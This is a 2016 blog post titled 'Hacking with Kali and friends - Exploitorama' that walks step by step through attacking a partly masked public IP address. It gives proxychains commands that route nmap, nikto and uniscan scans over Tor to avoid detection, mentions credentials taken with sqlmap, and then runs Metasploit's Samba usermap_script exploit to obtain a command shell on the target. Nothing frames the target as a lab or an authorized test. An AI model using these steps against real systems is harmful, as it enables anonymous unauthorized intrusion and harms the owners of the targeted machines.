Friday, February 5, 2016

Hacking with Kali and friends - Exploitorama

Scan the ip with nmap + proxychains to route it over tor;

anon@1337-817chs:~$sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105

Scan the site with nikto and uniscan + proxychains to route it over tor;

anon@1337-817chs:~$sudo proxychains nikto -h && proxychains nikto -h 104.28.##.105

anon@1337-817chs:~$sudo proxychains ./uniscan -u

that will take awhile...check on your sqlmap results from chapter 1

any usernames or passwords? ooh goody...
on too metasploit!!

The following info should have been obtained with the help of the tor cloaked scanning 

Target ip (from nslookup) 104.28.##.105
Target OS and Version (from nmap set to zero ping "-Pn" to avoid detection The
 -Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS)
kick it oldschool by googling  "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit. 

 We need to find out the OS and ports and services running on the target system.
Once you find the open ports and service like a samba port its party time.

Fire up Metasploit 

Route it through TOR
msf >set Proxies socks5:

We need to find the version of samba..

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit

With version in hand, restart msfconsole now we use the appropriate module...

msf >set Proxies socks5:
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit

We now have a command shell on the target box... have fun!

No comments:

Post a Comment